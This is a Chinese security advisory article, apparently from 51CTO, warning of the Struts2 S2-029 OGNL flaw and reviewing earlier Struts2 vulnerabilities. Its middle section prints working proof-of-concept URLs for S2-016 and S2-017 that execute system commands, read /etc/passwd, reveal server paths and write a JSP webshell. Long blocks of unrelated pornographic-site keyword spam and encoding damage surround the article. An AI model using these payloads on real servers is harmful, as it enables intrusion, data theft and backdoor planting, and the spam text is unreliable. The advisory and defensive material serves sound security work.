精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

預(yù)警:Struts最新遠(yuǎn)程執(zhí)行漏洞S2-029 0Day即將來(lái)襲

原創(chuàng)
安全 漏洞
最新高危遠(yuǎn)程執(zhí)行漏洞S2-029即將襲來(lái),您準(zhǔn)備好了嗎?本次漏洞是跟OGNL有關(guān),OGNL是Object-Graph Navigation Language的縮寫,全稱為對(duì)象圖導(dǎo)航語(yǔ)言,是一種功能強(qiáng)大的表達(dá)式語(yǔ)言,它通過(guò)簡(jiǎn)單一致的語(yǔ)法,可以任意存取對(duì)象的屬性或者調(diào)用對(duì)象的方法,能夠遍歷整個(gè)對(duì)象的結(jié)構(gòu)圖,實(shí)現(xiàn)對(duì)象屬性類型的轉(zhuǎn)換等功能。

Struts是Apache基金會(huì)Jakarta項(xiàng)目組的一個(gè)開源項(xiàng)目,Struts通過(guò)采用Java Servlet/JSP技術(shù),實(shí)現(xiàn)了基于Java EE Web應(yīng)用的Model-View-Controller(MVC)設(shè)計(jì)模式的應(yīng)用框架,是MVC經(jīng)典設(shè)計(jì)模式中的一個(gè)經(jīng)典產(chǎn)品。目前,Struts框架廣泛應(yīng)用于政府、公安、交通、金融行業(yè)和運(yùn)營(yíng)商的網(wǎng)站建設(shè),作為網(wǎng)站開發(fā)的底層模板使用,是應(yīng)用最廣泛的Web應(yīng)用框架之一。Struts2早期遠(yuǎn)程溢出漏洞曾經(jīng)風(fēng)靡一時(shí),使用網(wǎng)上公開的工具即可滲透開心網(wǎng)、人人網(wǎng)、銀行、高校以及企業(yè),給被入侵方造成巨大損失,可以說(shuō)是安全維護(hù)和運(yùn)營(yíng)人員心中永遠(yuǎn)的疼,而如今最新高危遠(yuǎn)程執(zhí)行漏洞S2-029即將襲來(lái),您準(zhǔn)備好了嗎?

[[163955]]

一、最新高危遠(yuǎn)程執(zhí)行漏洞S2-029

目前Struts2的最新版本為Struts 2.5 beta,Struts最新漏洞為S2-029,官方已經(jīng)發(fā)布公告,該漏洞危險(xiǎn)級(jí)別為高危。如下所示:

Summary 概要

當(dāng)在tag屬性中使用用戶的原始輸入時(shí)會(huì)導(dǎo)致雙OGNL表達(dá)式執(zhí)行。

struts2 漏洞

預(yù)警:Struts最新遠(yuǎn)程執(zhí)行漏洞S2-029 0Day即將來(lái)襲

解決方法

在使用的標(biāo)簽屬性中對(duì)每一個(gè)傳入的參數(shù)值進(jìn)行適當(dāng)?shù)尿?yàn)證或者升級(jí)到2.3.25的Struts。

本次漏洞是跟OGNL有關(guān),OGNL是Object-Graph Navigation Language的縮寫,全稱為對(duì)象圖導(dǎo)航語(yǔ)言,是一種功能強(qiáng)大的表達(dá)式語(yǔ)言,它通過(guò)簡(jiǎn)單一致的語(yǔ)法,可以任意存取對(duì)象的屬性或者調(diào)用對(duì)象的方法,能夠遍歷整個(gè)對(duì)象的結(jié)構(gòu)圖,實(shí)現(xiàn)對(duì)象屬性類型的轉(zhuǎn)換等功能。

二、歷史漏洞信息簡(jiǎn)要回顧

Struts官方安全公告給出了歷史所有漏洞信息,如圖1所示,Struts 最新遠(yuǎn)程執(zhí)行漏洞為S2-029。Struts2曾經(jīng)使國(guó)內(nèi)很多大型網(wǎng)站淪陷,Struts2漏洞的修復(fù)比較困難,Apache Struts2是一個(gè)應(yīng)用框架,它的漏洞并不像Windows一樣,及時(shí)發(fā)個(gè)補(bǔ)丁推送給用戶,更新了就沒事了,而是需要站長(zhǎng)和網(wǎng)站維護(hù)人員自己去更新這個(gè)補(bǔ)丁。下面簡(jiǎn)單回顧一下Struts2歷史高危漏洞:

預(yù)警:Struts最新遠(yuǎn)程執(zhí)行漏洞S2-029 0Day即將來(lái)襲

圖1 Struts2歷史漏洞列表

Struts歷史重要漏洞回顧:

1. Struts S-016和Struts S-017

Struts S-016漏洞原因是action的值redirect和redirectAction沒有正確過(guò)濾,導(dǎo)致可以執(zhí)行任意代碼,如系統(tǒng)命令、上傳、下載文件等。利用POC:

POC1:

  1. http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(5000)')(d))  

POC2:

  1. http://127.0.0.1/Struts2/test.action?id='%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Thread@sleep(5000))%2b'  

POC3:

 

  1. http://127.0.0.1/Struts2/hello.action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,@java.lang.Thread@sleep(5000))(meh%29&z[%28foo%29%28%27meh%27%29]=true  

POC4:

 

  1. http://127.0.0.1/Struts2/hello.action?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.Thread@sleep(5000))(aa)&x[(class.classLoader.jarPath)('aa')]  

POC5(執(zhí)行了兩次所以是10秒):

  1. http://127.0.0.1/Struts2/hello.action?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Thread@sleep(5000)} 

(4)執(zhí)行CMD命令的POC,關(guān)于回顯:webStr\75new\40byte[100] 修改為合適的長(zhǎng)度。

POC1:

 

  1. http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[100]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=cmd%20/c%20ipconfig  

POC2:

 

  1. http://127.0.0.1/Struts2/test.action?id='%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[100],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))%2b'&cmd=cmd%20/c%20ipconfig 

POC3:

 

  1. http://127.0.0.1/freecms/login_login.do?user.loginname=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=%20new%20java.lang.Boolean(false),%23_memberAccess[%22allowStaticMethodAccess%22]=new%20java.lang.Boolean(true),%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))&z[(user.loginname)('meh')]=true&cmd=cmd%20/c%20set 

POC4:

 

  1. http://127.0.0.1/Struts2/test.action?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d=+new+java.lang.Boolean(false),%23_memberAccess%5b%22allowStaticMethodAccess%22%5d=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23a=%40java.lang.Runtime%40getRuntime().exec(%23req.getParameter(%22cmd%22)).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5b50000%5d,%23c.read(%23d),%23s3cur1ty=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23s3cur1ty.println(%23d),%23s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]&cmd=cmd%20/c%20netstat%20-an 

POC5:

 

  1. http://127.0.0.1/Struts2/hello.action?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result),%23response.close()}&cmd=cmd%20/c%20set 

2. Struts S-017漏洞

(1)帶回顯命令執(zhí)行:

  1. http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 

(2)爆路徑:

 

  1. http://www.antian365.com/struts2-blank/example/X.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 

寫文件:

  1. http://www.antian365.com/struts2-blank/example/X.action?redirect:${  
  2.  
  3. %23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),  
  4.  
  5. %23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),  
  6.  
  7. new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()  
  8.  
  9. }&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e  

3.S2-018漏洞

Apache Struts 2的操作映射機(jī)制支持特殊參數(shù)前綴操作,這樣有可能會(huì)在表格底部附加引導(dǎo)信息,在映射 "action:" 前綴操作時(shí)存在安全繞過(guò)漏洞,可被利用繞過(guò)某些安全限制,訪問受限制功能。

4.S2-019漏洞

Apache Struts 2的“Dynamic Method Invocation”機(jī)制是默認(rèn)開啟的,僅提醒用戶如果可能的情況下關(guān)閉此機(jī)制,這樣就存在遠(yuǎn)程代碼執(zhí)行漏洞,遠(yuǎn)程攻擊者可利用此漏洞在受影響應(yīng)用上下文中執(zhí)行任意代碼。

5.S2-020漏洞

Apache Struts 2.0.0-2.3.16版本的默認(rèn)上傳機(jī)制是基于Commons FileUpload 1.3版本,其附加的ParametersInterceptor允許訪問'class' 參數(shù)(該參數(shù)直接映射到getClass()方法),并允許控制ClassLoader。在具體的Web容器部署環(huán)境下(如:Tomcat),攻擊者利用 Web容器下的Java Class對(duì)象及其屬性參數(shù)(如:日志存儲(chǔ)參數(shù)),可向服務(wù)器發(fā)起遠(yuǎn)程代碼執(zhí)行攻擊,進(jìn)而植入網(wǎng)站后門控制網(wǎng)站服務(wù)器主機(jī)。

三、建議防范方法

1.定期定日備份數(shù)據(jù)以及源代碼,在被攻擊第一時(shí)間恢復(fù)和還原。

2.測(cè)試能否對(duì)Struts2程序升級(jí),官方聲稱可以升級(jí)到最新版本,如果可以則升級(jí)到最新。

3.近期重點(diǎn)關(guān)注日志文件,對(duì)一些異常訪問或者流量突然增大進(jìn)行分析。

四、參考文章

1.http://struts.apache.org/docs/s2-016.html

2.http://struts.apache.org/docs/s2-017.html

3.Debug Struts2 S2-021的一點(diǎn)心得體會(huì):

http://drops.wooyun.org/papers/1778

4.S2-020:

http://struts.apache.org/release/2.3.x/docs/s2-020.html

5.S2-019的遠(yuǎn)程代碼執(zhí)行漏洞:

http://sebug.net/vuldb/ssvid-61048

6.S2-016官方補(bǔ)丁分析:

http://www.freebuf.com/articles/web/11234.html

7.struts2 最新S2-016-S2-017漏洞通殺struts2所有版本:

http://zone.wooyun.org/content/5159

8.S2-013的漏洞分析:

http://www.freebuf.com/vuls/9757.html

9.Struts2最近幾個(gè)漏洞分析&穩(wěn)定利用Payload:

http://www.freebuf.com/articles/web/25337.html

10.另外關(guān)于S2-020:

http://sec.baidu.com/index.php?research/detail/id/18

責(zé)任編輯:藍(lán)雨淚 來(lái)源: 51CTO.com
相關(guān)推薦

2009-07-06 13:15:07

2022-03-30 09:09:39

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2023-12-14 16:20:09

2021-04-13 16:40:18

0Day漏洞遠(yuǎn)程代碼

2021-07-27 11:01:02

Windows

2021-04-26 10:09:11

0Day漏洞Google Chro

2013-07-18 10:06:54

2015-02-05 15:58:06

2013-05-22 10:28:19

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2021-10-06 13:48:50

0day漏洞攻擊

2015-05-20 16:34:14

2017-02-07 11:00:26

2011-08-26 11:44:01

2022-03-25 13:41:55

漏洞網(wǎng)絡(luò)攻擊Quantum(量子

2013-05-24 14:02:42

2017-03-07 10:34:40

Struts2Struts2漏洞

2020-12-17 10:28:27

漏洞網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全

2010-01-20 16:13:15

2021-07-14 17:17:45

0day漏洞惡意代碼
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

av小说天堂网| 在线观看日本中文字幕| 黄色影院在线看| 成人综合婷婷国产精品久久| 91av视频在线观看| 奇米网一区二区| 国产成人福利av| 在线观看免费亚洲| 青青草综合在线| 狠狠v欧美ⅴ日韩v亚洲v大胸| 久久精品噜噜噜成人av农村| 久久久在线免费观看| 免费看91的网站| 国产毛片久久久| 欧美日韩性生活| 久久久999免费视频| 日本最新在线视频| 久久久精品欧美丰满| 91丝袜美腿美女视频网站| 成年人免费高清视频| 久久一区欧美| 色综合一区二区三区| 亚洲午夜精品久久| 天堂av中文在线资源库| 精品一区二区三区免费视频| 日本精品va在线观看| 日本老熟俱乐部h0930| 九九综合久久| 黄色录像免费观看| 日韩伦理在线| 国产精品福利一区二区三区| 国产中文一区二区| 免费观看成人在线视频| 超碰在线caoporen| 国产精品婷婷午夜在线观看| 国产精品推荐精品| av观看在线免费| 久久99精品久久久久婷婷| 色综合伊人色综合网站| 国内精品国产三级国产99| 欧美女优在线观看| 成人国产免费视频| 999热视频| 在线免费观看日韩欧美| 精品国产麻豆| 国产精品成人在线观看| 欧美视频1区| 桃花色综合影院| 东方aⅴ免费观看久久av| 91久久国产婷婷一区二区| 波多野结衣激情视频| 国产精品久久久久久久久久妞妞| 欧美激情亚洲视频| 久久机热这里只有精品| 欧美视频官网| 久久久久久高潮国产精品视| 日本妇女毛茸茸| 伊人久久大香线蕉精品组织观看| 久久亚洲国产成人| 日韩欧美综合视频| 99久久久久| 欧美精品在线看| 男女羞羞免费视频| 一区在线播放| 2021国产精品视频| 久久久久久不卡| 人人精品人人爱| 成人免费自拍视频| 精品二区在线观看| av动漫一区二区| 欧美极品视频一区二区三区| 成人在线免费电影| 亚洲三级理论片| www.好吊操| 欧美a级在线观看| 欧美性生交片4| 亚洲美女性囗交| 在线视频亚洲欧美中文| 日韩精品视频在线观看网址| 日本精品在线观看视频| 97精品国产| 欧美高清一级大片| 日本中文在线播放| 麻豆精品久久久| 成人免费91在线看| 日韩一二三四| 亚洲图片你懂的| 91九色丨porny丨国产jk| 日韩电影免费观看高清完整版| 欧美日韩一级二级| 免费观看污网站| 国产探花在线精品| 欧美极品少妇xxxxx| 五月婷婷视频在线| 精品一区二区精品| 美国av一区二区三区| 国产欧美黑人| 日韩欧美国产网站| 亚洲色图欧美自拍| 国产欧美高清视频在线| 欧美日韩国产123| av片免费观看| 成人免费高清视频在线观看| 亚洲精品视频一二三| 9999在线视频| 欧美精品在线观看播放| 男生裸体视频网站| 欧美成人一品| 国产精品日韩久久久久| 全国男人的天堂网| 亚洲欧美aⅴ...| 欧美精品第三页| 老牛影视av一区二区在线观看| 正在播放欧美视频| 日韩欧美亚洲视频| 国模少妇一区二区三区| 欧美裸体网站| www.51av欧美视频| 日韩一区二区视频在线观看| 丁香花五月婷婷| 国产情侣一区| 国产精品免费一区二区三区| 黄色在线论坛| 欧美午夜精品久久久久久超碰| 日韩精品一区二区三区高清免费| 欧美一区亚洲| 国产欧美中文字幕| 成人三级黄色免费网站| 日韩欧美精品在线观看| 97精品人妻一区二区三区蜜桃| 99精品视频在线| 成人福利免费观看| 手机毛片在线观看| 国产精品女主播一区二区三区| 99电影在线观看| 黄色一级大片在线免费看产| 欧美在线影院一区二区| 人妻少妇一区二区| 亚洲自啪免费| 久久综合福利| 蜜桃视频在线观看免费视频| 精品国产百合女同互慰| 久久亚洲成人av| 国产69精品久久777的优势| 欧美一级中文字幕| 日韩激情欧美| 久久91亚洲精品中文字幕奶水| 国产精品久久久久久久免费看| 中文字幕成人av| 日本久久久久久久久久久久| 波多野结衣一区| 国产精品一区久久| 免费在线看黄色| 91精品国产色综合久久不卡蜜臀| 欧美一区二区三区精品电影| 欧美特级黄色录像| 欧美一级网站| 欧美日本韩国国产| 日韩制服一区| 久久香蕉国产线看观看av| 国产三级漂亮女教师| 一区二区三区av电影| 九九九久久久久久久| 欧美午夜一区二区福利视频| 国产精品xxxx| 涩涩av在线| 国产亚洲欧美日韩美女| 一区二区www| 亚洲免费观看高清在线观看| 国产精品日日摸夜夜爽| 99视频精品| 日韩伦理一区二区三区av在线| 国产成人精品一区二区三区在线 | 围产精品久久久久久久| 91久久国产精品91久久性色| 国产蜜臀在线| 亚洲视频网站在线观看| 在线播放一级片| 一区二区三区在线观看视频| 国产亚洲色婷婷久久99精品91| 性欧美长视频| 中文字幕欧美人与畜| 国产劲爆久久| 国产伦精品免费视频| 日韩成人伦理| 亚洲午夜精品久久久久久性色 | 国产69精品久久久久久久| 天堂av一区二区三区在线播放| 国产精品精品久久久| 51xtv成人影院| 亚洲人线精品午夜| www.综合色| 色综合一区二区三区| 午夜国产福利一区二区| 91天堂素人约啪| 手机av在线免费| 亚洲国产裸拍裸体视频在线观看乱了中文 | 亚洲一区 在线播放| 里番精品3d一二三区| 国产精品嫩草视频| 福利小视频在线| 最近中文字幕2019免费| 十八禁一区二区三区| 欧美日韩国产精选| 久久久精品福利| **欧美大码日韩| 手机免费看av| 99国产精品国产精品毛片| 中文字幕av不卡在线| 国产亚洲毛片| 日本久久久网站| 欧美丰满日韩| 欧美综合77777色婷婷| 88久久精品| 91欧美激情另类亚洲| 欧美不卡高清一区二区三区| 国内精品400部情侣激情| 激情成人四房播| 一区二区三区四区在线观看视频| 天堂网在线播放| 日韩精品一区在线观看| 国产精品久久777777换脸| 在线视频国产一区| 亚洲午夜18毛片在线看| 天天亚洲美女在线视频| 久久亚洲成人av| 亚洲精品成人悠悠色影视| 欧洲美女女同性互添| 国产精品网友自拍| 免费黄在线观看| 国产色产综合产在线视频| 中文字幕影片免费在线观看| 夫妻av一区二区| 日本中文字幕在线不卡| 韩国午夜理伦三级不卡影院| 国产精品一区二区小说| 奇米精品一区二区三区在线观看| 青青草原av在线播放| 国产精品尤物| 欧美色图色综合| 免费看的黄色欧美网站| 久久精品.com| 日韩不卡在线观看日韩不卡视频| 粗暴91大变态调教| 久久久久久穴| 999精彩视频| 麻豆成人久久精品二区三区小说| 中文字幕一区二区三区四区在线视频| 久久午夜影视| 91制片厂毛片| 久草在线在线精品观看| 精品国产鲁一鲁一区二区三区| 国产精品主播直播| 亚洲理论中文字幕| 国产二区国产一区在线观看| 国产精品二区视频| 成人性生交大片免费看视频在线| 人妻换人妻a片爽麻豆| 99精品欧美一区| 谁有免费的黄色网址| 欧美韩日一区二区三区四区| 婷婷激情四射网| 一区二区三区欧美日韩| 日本一区二区三区四区五区| 欧美性生交大片免费| 亚洲男人天堂网址| 欧美绝品在线观看成人午夜影视| www.久久久久久| 日韩精品福利网站| аⅴ资源新版在线天堂| 不卡av日日日| 欧美aa在线| 成人a在线观看| 国内自拍欧美| 日韩偷拍一区二区| 欧美91精品| 激情六月丁香婷婷| 韩国一区二区在线观看| 免费日本黄色网址| 国产精品你懂的| 日韩激情一区二区三区| 日本久久电影网| 国产成人精品亚洲精品色欲| 日韩av影片在线观看| av影片在线看| 992tv在线成人免费观看| a屁视频一区二区三区四区| 不卡的av一区| 精品国产视频| 日韩人妻无码精品久久久不卡| 久久久久久久波多野高潮日日| 国产在线视频三区| 久久久精品2019中文字幕之3| 一级片一级片一级片| 五月天久久比比资源色| 国产又粗又长又大视频| 亚洲欧美国产另类| jizz性欧美10| 国产精品人成电影| 美女扒开腿让男人桶爽久久动漫| 一级日韩一区在线观看| 99热精品在线观看| 日韩av影视大全| 久久精品亚洲精品国产欧美kt∨| 青青草原国产视频| 欧美三区在线视频| 香蕉视频黄在线观看| 不卡av电影在线观看| 岛国一区二区| 欧美精品免费观看二区| 精品1区2区3区4区| 99999精品| 国产精品久久久久永久免费观看 | 午夜亚洲福利在线老司机| 中文字幕第22页| 国产欧美精品国产国产专区| 日韩欧美不卡视频| 日韩欧美国产高清| 黄色网在线播放| 国产精品狼人色视频一区| 首页亚洲中字| 黄页免费在线观看视频| 国产精品18久久久久久久久久久久| 午夜精产品一区二区在线观看的| 亚洲成人av一区| 亚洲国产综合网| 蜜臀久久99精品久久久无需会员| 国内精品伊人| 日韩欧美99| 日精品一区二区| 欧美老熟妇乱大交xxxxx| 五月天欧美精品| 午夜成人鲁丝片午夜精品| 色综合久久精品亚洲国产| 国产精品国产三级在线观看| 一本色道久久99精品综合| 蜜臀va亚洲va欧美va天堂| 69精品无码成人久久久久久| 色欧美88888久久久久久影院| 日本福利片高清在线观看| 69视频在线免费观看| 久久99国产精品久久99大师 | 日韩不卡av| 日韩激情中文字幕| 一区二区精品免费| 色狠狠色噜噜噜综合网| 国产美女性感在线观看懂色av| 欧美在线视频一区| 免费欧美激情| 久久久久免费精品| 中文字幕乱码一区二区免费| 国产偷人爽久久久久久老妇app| 一本色道久久综合亚洲精品小说 | 日本最新一区二区三区视频观看| 日韩国产在线一| 中文字幕第69页| 91精品国产91热久久久做人人| 18加网站在线| 国产伦精品一区二区| 欧美亚洲在线| 亚洲熟女毛茸茸| 日韩视频一区二区在线观看| segui88久久综合| 欧美精品v日韩精品v国产精品| 日韩和欧美一区二区| 久久高清内射无套| 亚洲精品一线二线三线| 丁香六月综合| 中文字幕欧美日韩一区二区三区 | 尤物在线免费视频| 精品少妇一区二区三区| 中文字幕资源网在线观看免费 | 日本xxx在线播放| 欧美日精品一区视频| 国产在线观看a| 精品麻豆av| 免费在线观看成人| 国产一级黄色av| 亚洲午夜久久久影院| 国产精区一区二区| 欧美啪啪免费视频| 国产精品久久久久影院| 男人的天堂a在线| 国产精品一区电影| 亚洲黄色高清| 97精品在线播放| 亚洲国产高潮在线观看| 高清在线一区| 免费毛片网站在线观看| 中文字幕乱码一区二区免费| 色呦呦中文字幕| 91精品在线播放| 丝袜美腿高跟呻吟高潮一区| 午夜免费激情视频| 伊人久久精品视频| 女人抽搐喷水高潮国产精品| 国产精品视频中文字幕| 欧美日韩国产精品| 中文字幕伦理免费在线视频 | 2019中文字幕在线电影免费|